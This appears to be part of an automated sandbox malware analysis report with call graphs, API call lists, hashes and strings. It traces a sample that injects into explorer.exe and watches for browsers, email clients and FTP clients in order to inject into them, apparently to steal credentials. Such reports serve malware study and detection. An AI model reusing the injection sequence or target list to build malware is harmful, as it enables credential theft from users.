                                                        • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                        • Instruction Fuzzy Hash: 1411C630601D894FEB9DF7BA58992B933D5EB58306F64093AE415D72A6DE798B808300

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000E1B74: OpenFileMappingA.KERNEL32 ref: 000E1B8B
                                                          • Part of subcall function 000E1B74: MapViewOfFile.KERNEL32 ref: 000E1BAA
                                                        • SysFreeMap.PGOCR ref: 000E51A9
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 000E51B3
                                                        • Process32First.KERNEL32 ref: 000E51D6
                                                        • lstrcmpi.KERNEL32 ref: 000E51F1
                                                        • Process32Next.KERNEL32 ref: 000E52D9
                                                        • CloseHandle.KERNELBASE ref: 000E52EA
                                                        • SleepEx.KERNEL32 ref: 000E52F5
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.624491606.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32Viewlstrcmpi
                                                        • String ID:
                                                        • API String ID: 3402289966-0
                                                        • Opcode ID: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                        • Instruction ID: d71c50dd3138e9ac7706fb941c1d42d1f75f7732594f66d4c7faff6650fcf709
                                                        • Opcode Fuzzy Hash: b08314583b3292b42ea9aaba231a76af201b60a4b1773454188c57f449f80528
                                                        • Instruction Fuzzy Hash: BC51B730204E888FEB59EF69DC99AE973E1FB94305F040A69E407E71A2DF78D905C781

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 48 ed748-ed74b 49 ed755-ed759 48->49 50 ed75b-ed763 49->50 51 ed765 49->51 50->51 52 ed74d-ed753 51->52 53 ed767 51->53 52->49 54 ed76a-ed771 53->54 56 ed77d 54->56 57 ed773-ed77b 54->57 56->54 58 ed77f-ed782 56->58 57->56 59 ed797-ed7a4 58->59 60 ed784-ed792 58->60 70 ed7be-ed7cc call ed70a 59->70 71 ed7a6-ed7a8 59->71 61 ed7ce-ed7e9 60->61 62 ed794-ed795 60->62 63 ed81a-ed81d 61->63 62->59 65 ed81f-ed820 63->65 66 ed822-ed829 63->66 68 ed801-ed805 65->68 69 ed82f-ed833 66->69 72 ed7eb-ed7ee 68->72 73 ed807-ed80a 68->73 74 ed884-ed88d 69->74 75 ed835-ed84e LoadLibraryA 69->75 70->49 78 ed7ab-ed7b2 71->78 72->66 76 ed7f0 72->76 73->66 79 ed80c-ed810 73->79 77 ed890-ed899 74->77 81 ed84f-ed856 75->81 83 ed7f1-ed7f5 76->83 84 ed8be-ed90e VirtualProtect * 2 77->84 85 ed89b-ed89d 77->85 95 ed7bc 78->95 96 ed7b4-ed7ba 78->96 79->83 86 ed812-ed819 79->86 81->69 82 ed858-ed86e 81->82 98 ed879-ed883 82->98 99 ed870-ed877 82->99 83->68 88 ed7f7-ed7f9 83->88 92 ed912-ed917 84->92 89 ed89f-ed8ae 85->89 90 ed8b0-ed8bc 85->90 86->63 88->68 94 ed7fb-ed7ff 88->94 89->77 90->89 92->92 97 ed919-ed928 92->97 94->68 94->73 95->70 95->78 96->95 99->81
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 000ED847
                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 000ED8E5
                                                        • VirtualProtect.KERNELBASE ref: 000ED903
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.624491606.00000000000EC000.00000040.80000000.00040000.00000000.sdmp, Offset: 000EC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_ec000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 895956442-0
                                                        • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                        • Instruction ID: d53d9f834d506e3d4ff3502a79634dc9814ab7a84ab47d8519c68a9da176717b
                                                        • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                        • Instruction Fuzzy Hash: 1D51893236899D0FDB28AB3D9CC43F9B7D1F759325B58063BC4DAD3285EA58C8468381

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 101 e1b74-e1b94 OpenFileMappingA 102 e1b96-e1bb4 MapViewOfFile 101->102 103 e1bb7-e1bc4 101->103 102->103
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.624491606.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MappingOpenView
                                                        • String ID:
                                                        • API String ID: 3439327939-0
                                                        • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                        • Instruction ID: e5abea98356b676f12dbf069f3b67b236b1c676cd93db27c88262866e7ab4d0c
                                                        • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                        • Instruction Fuzzy Hash: 77F08C34318F094FAB44EF7C9C8C536B7E0EBA8202B008A7EA84AC7164EF34C8808701

                                                        Execution Graph

                                                        Execution Coverage:10.3%
                                                        Dynamic/Decrypted Code Coverage:97.4%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:306
                                                        Total number of Limit Nodes:42
                                                        execution_graph 707 87728 708 87904 707->708 709 8774b 707->709 708->708 710 8785a LoadLibraryA 709->710 714 8789f VirtualProtect VirtualProtect 709->714 711 87871 710->711 711->709 713 87883 GetProcAddress 711->713 713->711 715 87899 713->715 714->708 991 8245e lstrlen 992 824a5 991->992 993 82476 CryptBinaryToStringA 991->993 993->992 994 82489 993->994 997 82861 GetProcessHeap RtlAllocateHeap 994->997 996 82494 CryptBinaryToStringA 996->992 997->996 716 81000 717 81010 716->717 718 81007 716->718 720 81016 718->720 769 82608 VirtualQuery 720->769 723 81097 723->717 725 8102c RtlMoveMemory 726 8104d 725->726 727 81071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 82861 GetProcessHeap RtlAllocateHeap 726->806 729 8109e 727->729 730 81092 727->730 772 810a4 729->772 730->723 731 81095 730->731 807 81332 731->807 733 81052 RtlMoveMemory 733->727 734 810a3 736 82861 GetProcessHeap RtlAllocateHeap 734->736 737 810cc 736->737 738 810dc CreateToolhelp32Snapshot 737->738 739 810f0 Process32First 738->739 740 81322 Sleep 738->740 741 8131b CloseHandle 739->741 742 8110c lstrcmpi 739->742 740->738 741->740 743 81124 lstrcmpi 742->743 765 81280 742->765 745 81138 lstrcmpi 743->745 743->765 744 825ad OpenProcess IsWow64Process IsWow64Process CloseHandle 744->765 746 8114c lstrcmpi 745->746 745->765 747 81160 lstrcmpi 746->747 746->765 749 81170 lstrcmpi 747->749 747->765 748 81305 Process32Next 748->742 750 81319 748->750 751 81184 lstrcmpi 749->751 749->765 750->741 752 81198 lstrcmpi 751->752 751->765 753 811ac lstrcmpi 752->753 752->765 754 811c0 lstrcmpi 753->754 753->765 755 811d4 lstrcmpi 754->755 754->765 756 811e8 lstrcmpi 755->756 755->765 758 811fc lstrcmpi 756->758 756->765 757 82608 VirtualQuery 757->765 759 8120c lstrcmpi 758->759 758->765 761 8121c lstrcmpi 759->761 759->765 760 812ae lstrcmpi 760->765 762 8122c lstrcmpi 761->762 761->765 763 8123c lstrcmpi 762->763 762->765 763->765 766 8124c lstrcmpi 763->766 764 81819 30 API calls 764->765 765->744 765->748 765->757 765->760 765->764 766->765 767 8125c lstrcmpi 766->767 767->765 768 8126c lstrcmpi 767->768 768->748 768->765 770 8101e 769->770 770->723 771 82861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 82861 GetProcessHeap RtlAllocateHeap 772->834 774 810cc 775 810dc CreateToolhelp32Snapshot 774->775 776 810f0 Process32First 775->776 777 81322 Sleep 775->777 778 8131b CloseHandle 776->778 779 8110c lstrcmpi 776->779 777->775 778->777 780 81124 lstrcmpi 779->780 790 81280 779->790 782 81138 lstrcmpi 780->782 780->790 783 8114c lstrcmpi 782->783 782->790 784 81160 lstrcmpi 783->784 783->790 786 81170 lstrcmpi 784->786 784->790 785 81305 Process32Next 785->779 787 81319 785->787 788 81184 lstrcmpi 786->788 786->790 787->778 789 81198 lstrcmpi 788->789 788->790 789->790 791 811ac lstrcmpi 789->791 790->785 795 82608 VirtualQuery 790->795 798 812ae lstrcmpi 790->798 835 825ad OpenProcess 790->835 841 81819 790->841 791->790 792 811c0 lstrcmpi 791->792 792->790 793 811d4 lstrcmpi 792->793 793->790 794 811e8 lstrcmpi 793->794 794->790 796 811fc lstrcmpi 794->796 795->790 796->790 797 8120c lstrcmpi 796->797 797->790 799 8121c lstrcmpi 797->799 798->790 799->790 800 8122c lstrcmpi 799->800 800->790 801 8123c lstrcmpi 800->801 801->790 803 8124c lstrcmpi 801->803 803->790 804 8125c lstrcmpi 803->804 804->790 805 8126c lstrcmpi 804->805 805->785 805->790 806->733 887 82861 GetProcessHeap RtlAllocateHeap 807->887 809 81340 GetModuleFileNameA 888 82861 GetProcessHeap RtlAllocateHeap 809->888 811 81357 GetCurrentProcessId wsprintfA 889 8263e CryptAcquireContextA 811->889 814 8139c Sleep 894 824d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 814->894 815 8140d 912 82843 815->912 818 813ae GetModuleHandleA GetProcAddress 820 813c9 818->820 821 813da GetModuleHandleA GetProcAddress 818->821 902 81de3 820->902 824 813f5 821->824 825 81406 821->825 822 82843 3 API calls 826 8141b RtlExitUserThread 822->826 827 81de3 3 API calls 824->827 828 824d5 10 API calls 825->828 829 81425 826->829 827->825 828->815 830 82608 VirtualQuery 829->830 832 8144b 829->832 831 8143a 830->831 831->832 917 81493 831->917 832->729 834->774 836 825cb IsWow64Process 835->836 837 82600 835->837 838 825dc IsWow64Process 836->838 839 825ee 836->839 837->790 838->839 840 825f9 CloseHandle 838->840 839->840 840->837 842 82608 VirtualQuery 841->842 843 81833 842->843 844 81845 OpenProcess 843->844 845 81a76 843->845 844->845 846 8185e 844->846 845->790 847 82608 VirtualQuery 846->847 848 81865 847->848 848->845 849 8188f 848->849 850 81873 NtSetInformationProcess 848->850 872 81a80 849->872 850->849 853 81a80 2 API calls 854 818d6 853->854 855 81a73 CloseHandle 854->855 856 81a80 2 API calls 854->856 855->845 857 81900 856->857 878 81b17 857->878 860 81a80 2 API calls 861 81930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 860->861 862 81a4e CreateRemoteThread 861->862 863 81985 861->863 864 81a65 CloseHandle 862->864 865 8198b CreateMutexA GetLastError 863->865 868 819bb GetModuleHandleA GetProcAddress ReadProcessMemory 863->868 866 81a67 CloseHandle CloseHandle 864->866 865->863 867 819a7 CloseHandle Sleep 865->867 866->855 867->865 869 819ec WriteProcessMemory 868->869 870 81a47 868->870 869->870 871 81a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 869->871 870->864 870->866 871->870 873 81a94 872->873 875 818b4 872->875 874 81aa4 NtCreateSection 873->874 876 81ac3 873->876 874->876 875->853 876->875 877 81ad8 NtMapViewOfSection 876->877 877->875 879 81b2e 878->879 885 81b60 878->885 880 81b30 RtlMoveMemory 879->880 880->880 880->885 881 81bc3 882 81910 NtUnmapViewOfSection 881->882 884 81be1 LdrProcessRelocationBlock 881->884 882->860 883 81b71 LoadLibraryA 883->882 883->885 884->881 884->882 885->881 885->883 886 81ba1 GetProcAddress 885->886 886->882 886->885 887->809 888->811 890 81384 CreateMutexA GetLastError 889->890 891 82664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 889->891 890->814 890->815 892 826aa wsprintfA 891->892 892->892 893 826cc CryptDestroyHash CryptReleaseContext 892->893 893->890 895 82515 894->895 896 82565 CloseHandle 895->896 897 82555 Thread32Next 895->897 898 82521 OpenThread 895->898 896->818 897->895 899 8253c SuspendThread 898->899 900 82544 ResumeThread 898->900 901 8254a CloseHandle 899->901 900->901 901->897 903 81ded 902->903 911 81e56 902->911 903->911 944 81e93 VirtualProtect 903->944 905 81e04 905->911 945 82815 VirtualAlloc 905->945 907 81e10 908 81e1a RtlMoveMemory 907->908 910 81e2d 907->910 908->910 946 81e93 VirtualProtect 910->946 911->821 913 82608 VirtualQuery 912->913 914 8284b 913->914 915 81414 914->915 916 8284f GetProcessHeap HeapFree 914->916 915->822 916->915 918 814c0 917->918 919 814a1 917->919 921 814c8 918->921 922 81510 918->922 947 817c7 919->947 924 817c7 5 API calls 921->924 940 814b6 921->940 966 826e6 lstrlen lstrlen 922->966 926 814e0 924->926 926->940 954 81647 926->954 927 8155f 928 826e6 2 API calls 927->928 931 8156c 928->931 930 81532 968 81752 GetModuleHandleA GetProcAddress 930->968 933 815a0 931->933 934 81584 931->934 931->940 938 82404 5 API calls 933->938 933->940 971 82404 lstrlen 934->971 941 815ac 938->941 939 81647 11 API calls 939->940 940->832 941->940 942 81647 11 API calls 941->942 943 814fb 942->943 943->940 977 815e0 943->977 944->905 945->907 946->911 948 817d1 947->948 951 81812 947->951 949 826e6 2 API calls 948->949 948->951 950 817f1 949->950 950->951 982 82861 GetProcessHeap RtlAllocateHeap 950->982 951->940 953 81804 RtlMoveMemory 953->951 955 81660 954->955 965 81745 954->965 956 81671 lstrlen 955->956 955->965 957 81683 lstrlen 956->957 956->965 958 81690 getpeername 957->958 957->965 959 816ae inet_ntoa htons 958->959 958->965 963 816cc 959->963 959->965 961 81717 wsprintfA 962 8173a 961->962 964 82843 3 API calls 962->964 962->965 963->965 983 82861 GetProcessHeap RtlAllocateHeap 963->983 964->965 965->943 967 8151d 966->967 967->927 967->930 969 81539 968->969 970 81776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 968->970 969->939 969->940 970->969 972 8241c CryptStringToBinaryA 971->972 973 82456 971->973 972->973 974 82438 972->974 973->940 984 82861 GetProcessHeap RtlAllocateHeap 974->984 976 82444 CryptStringToBinaryA 976->973 978 82843 3 API calls 977->978 979 815f5 978->979 980 82843 3 API calls 979->980 981 815fc 980->981 981->940 982->953 983->961 984->976 998 81425 999 8144b 998->999 1000 81432 998->1000 1001 82608 VirtualQuery 1000->1001 1002 8143a 1001->1002 1002->999 1003 81493 23 API calls 1002->1003 1003->999 1004 82806 VirtualFree 1005 81eb6 1006 81ed9 1005->1006 1007 81ecc lstrlen 1005->1007 1016 82861 GetProcessHeap RtlAllocateHeap 1006->1016 1007->1006 1009 81ee1 lstrcat 1010 81f1d 1009->1010 1011 81f16 lstrcat 1009->1011 1017 81f4a 1010->1017 1011->1010 1014 82843 3 API calls 1015 81f40 1014->1015 1016->1009 1051 822b8 1017->1051 1021 81f77 1056 827e2 lstrlen MultiByteToWideChar 1021->1056 1023 81f86 1057 82374 RtlZeroMemory 1023->1057 1026 81fd8 RtlZeroMemory 1028 8200d 1026->1028 1027 82843 3 API calls 1029 81f2d 1027->1029 1032 8229a 1028->1032 1034 8203b 1028->1034 1059 822e5 1028->1059 1029->1014 1031 82280 1031->1032 1033 82843 3 API calls 1031->1033 1032->1027 1033->1032 1034->1031 1068 82861 GetProcessHeap RtlAllocateHeap 1034->1068 1036 8210b wsprintfW 1037 82131 1036->1037 1041 8219e 1037->1041 1069 82861 GetProcessHeap RtlAllocateHeap 1037->1069 1039 8216b wsprintfW 1039->1041 1040 8225d 1042 82843 3 API calls 1040->1042 1041->1040 1070 82861 GetProcessHeap RtlAllocateHeap 1041->1070 1044 82271 1042->1044 1044->1031 1045 82843 3 API calls 1044->1045 1045->1031 1046 821e9 1047 82256 1046->1047 1071 82815 VirtualAlloc 1046->1071 1049 82843 3 API calls 1047->1049 1049->1040 1050 82243 RtlMoveMemory 1050->1047 1052 81f69 1051->1052 1053 822c2 1051->1053 1055 82861 GetProcessHeap RtlAllocateHeap 1052->1055 1054 826e6 2 API calls 1053->1054 1054->1052 1055->1021 1056->1023 1058 81f96 1057->1058 1058->1026 1058->1032 1061 822f2 1059->1061 1062 82353 1059->1062 1060 822f6 DnsQuery_W 1060->1061 1061->1060 1061->1062 1063 82335 DnsFree inet_ntoa 1061->1063 1062->1034 1063->1061 1064 82355 1063->1064 1072 82861 GetProcessHeap RtlAllocateHeap 1064->1072 1066 8235f 1073 827e2 lstrlen MultiByteToWideChar 1066->1073 1068->1036 1069->1039 1070->1046 1071->1050 1072->1066 1073->1062

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00082608 1 Function_00081F4A 7 Function_00082843 1->7 21 Function_00082815 1->21 30 Function_00082861 1->30 31 Function_000827E2 1->31 35 Function_000822E5 1->35 37 Function_000822B8 1->37 39 Function_00082731 1->39 42 Function_00082374 1->42 2 Function_00081A80 3 Function_00081DC0 13 Function_00081C19 3->13 4 Function_00081D80 4->13 5 Function_00081000 22 Function_00081016 5->22 6 Function_00082841 7->0 8 Function_00082404 8->30 9 Function_00082806 10 Function_00081647 10->7 28 Function_000824AE 10->28 10->30 11 Function_000817C7 11->30 36 Function_000826E6 11->36 12 Function_00081819 12->0 12->2 23 Function_00081B17 12->23 14 Function_00081E5D 14->4 15 Function_0008245E 15->30 16 Function_00082592 17 Function_00081752 18 Function_00081493 18->8 18->10 18->11 18->17 29 Function_000815E0 18->29 18->36 19 Function_00081E93 20 Function_000824D5 22->0 22->12 22->16 27 Function_000825AD 22->27 22->30 33 Function_000810A4 22->33 22->39 40 Function_00081332 22->40 41 Function_00082573 22->41 24 Function_00083417 25 Function_00087728 26 Function_00081469 26->0 26->18 29->7 32 Function_00081DE3 32->3 32->14 32->19 32->21 33->0 33->12 33->16 33->27 33->30 33->39 33->41 34 Function_00081425 34->0 34->18 35->30 35->31 37->36 38 Function_0008263E 40->0 40->7 40->18 40->20 40->30 40->32 40->38 43 Function_00081EB6 43->1 43->7 43->30

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 81016-81020 call 82608 3 81022-8104b call 82861 RtlMoveMemory 0->3 4 81097-81098 0->4 7 8104d-8106b call 82861 RtlMoveMemory 3->7 8 81071-81090 NtUnmapViewOfSection GetCurrentProcessId 3->8 7->8 10 8109e-810d7 call 810a4 call 82861 8->10 11 81092-81093 8->11 21 810dc-810ea CreateToolhelp32Snapshot 10->21 11->4 12 81095-81099 call 81332 11->12 12->10 22 810f0-81106 Process32First 21->22 23 81322-8132d Sleep 21->23 24 8131b-8131c CloseHandle 22->24 25 8110c-8111e lstrcmpi 22->25 23->21 24->23 26 81280-81289 call 825ad 25->26 27 81124-81132 lstrcmpi 25->27 33 8128b-81294 call 82592 26->33 34 81305-81313 Process32Next 26->34 27->26 29 81138-81146 lstrcmpi 27->29 29->26 31 8114c-8115a lstrcmpi 29->31 31->26 32 81160-8116a lstrcmpi 31->32 32->26 35 81170-8117e lstrcmpi 32->35 33->34 41 81296-8129d call 82573 33->41 34->25 36 81319 34->36 35->26 38 81184-81192 lstrcmpi 35->38 36->24 38->26 40 81198-811a6 lstrcmpi 38->40 40->26 42 811ac-811ba lstrcmpi 40->42 41->34 47 8129f-812ac call 82608 41->47 42->26 44 811c0-811ce lstrcmpi 42->44 44->26 46 811d4-811e2 lstrcmpi 44->46 46->26 48 811e8-811f6 lstrcmpi 46->48 47->34 53 812ae-81300 lstrcmpi call 82731 call 81819 call 82731 47->53 48->26 50 811fc-8120a lstrcmpi 48->50 50->26 52 8120c-8121a lstrcmpi 50->52 52->26 54 8121c-8122a lstrcmpi 52->54 53->34 54->26 56 8122c-8123a lstrcmpi 54->56 56->26 58 8123c-8124a lstrcmpi 56->58 58->26 61 8124c-8125a lstrcmpi 58->61 61->26 63 8125c-8126a lstrcmpi 61->63 63->26 64 8126c-8127a lstrcmpi 63->64 64->26 64->34
                                                        APIs
                                                          • Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615
                                                          • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                          • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106B
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081074
                                                        • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107A
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
                                                        • Process32First.KERNEL32(00000000,?), ref: 000810FE
                                                        • lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
                                                        • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
                                                        • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
                                                        • lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
                                                        • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
                                                        • lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
                                                        • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
                                                        • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
                                                        • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
                                                        • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
                                                        • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
                                                        • lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
                                                        • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
                                                        • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
                                                        • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
                                                        • lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
                                                        • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
                                                        • lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
                                                        • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
                                                        • CloseHandle.KERNELBASE(00000000), ref: 0008131C
                                                        • Sleep.KERNELBASE(000003E8), ref: 00081327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                        • API String ID: 2555639992-1680033604
                                                        • Opcode ID: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
                                                        • Instruction ID: c6fb3a315111370b2d623b8f7e562b9d3a4c86b5ba4b7d63d824c8c2a37431fe
                                                        • Opcode Fuzzy Hash: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
                                                        • Instruction Fuzzy Hash: F9719330604305ABDB50FBB19C49EAE7BECBF85B90B040529FAC1C7191EB75DA068B65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 65 810a4-810d7 call 82861 68 810dc-810ea CreateToolhelp32Snapshot 65->68 69 810f0-81106 Process32First 68->69 70 81322-8132d Sleep 68->70 71 8131b-8131c CloseHandle 69->71 72 8110c-8111e lstrcmpi 69->72 70->68 71->70 73 81280-81289 call 825ad 72->73 74 81124-81132 lstrcmpi 72->74 80 8128b-81294 call 82592 73->80 81 81305-81313 Process32Next 73->81 74->73 76 81138-81146 lstrcmpi 74->76 76->73 78 8114c-8115a lstrcmpi 76->78 78->73 79 81160-8116a lstrcmpi 78->79 79->73 82 81170-8117e lstrcmpi 79->82 80->81 88 81296-8129d call 82573 80->88 81->72 83 81319 81->83 82->73 85 81184-81192 lstrcmpi 82->85 83->71 85->73 87 81198-811a6 lstrcmpi 85->87 87->73 89 811ac-811ba lstrcmpi 87->89 88->81 94 8129f-812ac call 82608 88->94 89->73 91 811c0-811ce lstrcmpi 89->91 91->73 93 811d4-811e2 lstrcmpi 91->93 93->73 95 811e8-811f6 lstrcmpi 93->95 94->81 100 812ae-81300 lstrcmpi call 82731 call 81819 call 82731 94->100 95->73 97 811fc-8120a lstrcmpi 95->97 97->73 99 8120c-8121a lstrcmpi 97->99 99->73 101 8121c-8122a lstrcmpi 99->101 100->81 101->73 103 8122c-8123a lstrcmpi 101->103 103->73 105 8123c-8124a lstrcmpi 103->105 105->73 108 8124c-8125a lstrcmpi 105->108 108->73 110 8125c-8126a lstrcmpi 108->110 110->73 111 8126c-8127a lstrcmpi 110->111 111->73 111->81
                                                        APIs
                                                          • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                          • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
                                                        • Process32First.KERNEL32(00000000,?), ref: 000810FE
                                                        • lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
                                                        • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
                                                        • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
                                                        • lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
                                                        • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
                                                        • lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
                                                        • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
                                                        • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
                                                        • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
                                                        • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
                                                        • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
                                                        • lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
                                                        • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
                                                        • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
                                                        • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
                                                        • lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
                                                        • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
                                                        • lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
                                                        • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
                                                        • CloseHandle.KERNELBASE(00000000), ref: 0008131C
                                                        • Sleep.KERNELBASE(000003E8), ref: 00081327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                        • API String ID: 3950187957-1680033604
                                                        • Opcode ID: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
                                                        • Instruction ID: 92ea90e728a065c3b10ee3f836ed5eb5e8a8dda0ab9d7eab971388ade25db994
                                                        • Opcode Fuzzy Hash: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
                                                        • Instruction Fuzzy Hash: 79517270604305A7DB50FBB18C85EAF7AECBF85B90B040939FAC1D6081EB64DA068B75

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
